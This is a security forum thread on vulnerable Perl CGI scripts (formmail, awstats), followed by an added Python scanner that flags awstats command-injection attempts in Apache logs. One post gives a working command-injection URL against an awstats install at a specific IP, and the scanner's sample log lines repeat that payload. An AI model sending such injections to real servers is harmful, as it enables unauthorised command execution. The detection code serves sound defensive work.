
Thread: formmail.pl

  1. #11
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,401
    Originally posted here by sploiterwannabe
    Yep, I have read, and the discussion here is about web security.
    Most Perl scripts can make anybody gain access to servers,
    like count.cgi for example, or awstats.pl, calendar.pl.
    With these scripts somebody could view files and folders on certain servers.
    Most perl scripts? I don't think so. Only the badly written ones.
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  2. #12
    Senior Member
    Join Date
    Mar 2004
    Location
    Colorado
    Posts
    421
    Originally posted here by Black Cluster
    Abandon the chances of finding such a vulnerability nowadays .... Unless you are dealing with REALLY REALLY non-patched system and most importantly .. stupid admins
    We have found that any webserver that has been running for more than a few years has a good chance of running a bad perl script like formmail. There was a time when a large percentage of "home pages" got their guestbooks, hitcounters, and form processors from Matt's Script Archive since they were the "cgi" download spot of choice in the mid 1990s.
    Just last fall we upgraded ~ 100 webservers a company had from another company they took over...All running bad versions of formmail. Was spammer heaven to be sure.

  3. #13
    unpatched awstats script

    http://194.168.163.54/cgi-bin/awstat....pl?configdir=|echo;ls%20-alF;exit|
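
Added example, not part of the thread: a log check a server admin can run to find requests of the kind shown in post #13, where the `configdir` parameter sent to awstats.pl carries shell metacharacters. It assumes Apache common/combined log format; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Characters a directory path passed as configdir should never contain.
SHELL_META = re.compile(r"[|;&`$<>\r\n]")
# Assumed log layout: Apache common/combined format.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2005:10:01:22 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;ls%20-alF;exit| HTTP/1.0" 200 1432',
    '198.51.100.7 - - [12/Mar/2005:10:04:51 +0000] "GET /cgi-bin/awstats.pl?configdir=%7Cecho%3Bls%20-alF%3Bexit%7C HTTP/1.0" 200 1432',
    '203.0.113.5 - - [12/Mar/2005:10:05:02 +0000] "GET /cgi-bin/awstats.pl?config=example.org HTTP/1.1" 200 8841',
    '203.0.113.5 - - [12/Mar/2005:10:05:40 +0000] "GET /cgi-bin/awstats.pl?configdir=/etc/awstats HTTP/1.1" 200 8790',
]

def suspicious_configdir(target):
    """Return the decoded configdir value if it holds shell metacharacters."""
    parts = urlsplit(target)
    if not re.search(r"/awstats[^/]*\.pl$", parts.path, re.IGNORECASE):
        return None
    for pair in parts.query.split("&"):
        key, _, raw = pair.partition("=")
        value = unquote_plus(raw)  # decode first so %7C is seen as |
        if key.lower() == "configdir" and SHELL_META.search(value):
            return value
    return None

def scan(lines):
    """Return (client, status, decoded configdir) for every flagged request."""
    hits = []
    for line in lines:
        match = REQUEST.match(line)
        if not match:
            continue
        client, _method, target, status = match.groups()
        value = suspicious_configdir(target)
        if value is not None:
            hits.append((client, int(status), value))
    return hits

if __name__ == "__main__":
    for client, status, value in scan(SAMPLE_LOG):
        print(f"{client} status={status} configdir={value!r}")
```

A flagged request that returned 200 deserves a closer look at the host; the percent-encoded line shows why the value has to be decoded before matching.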
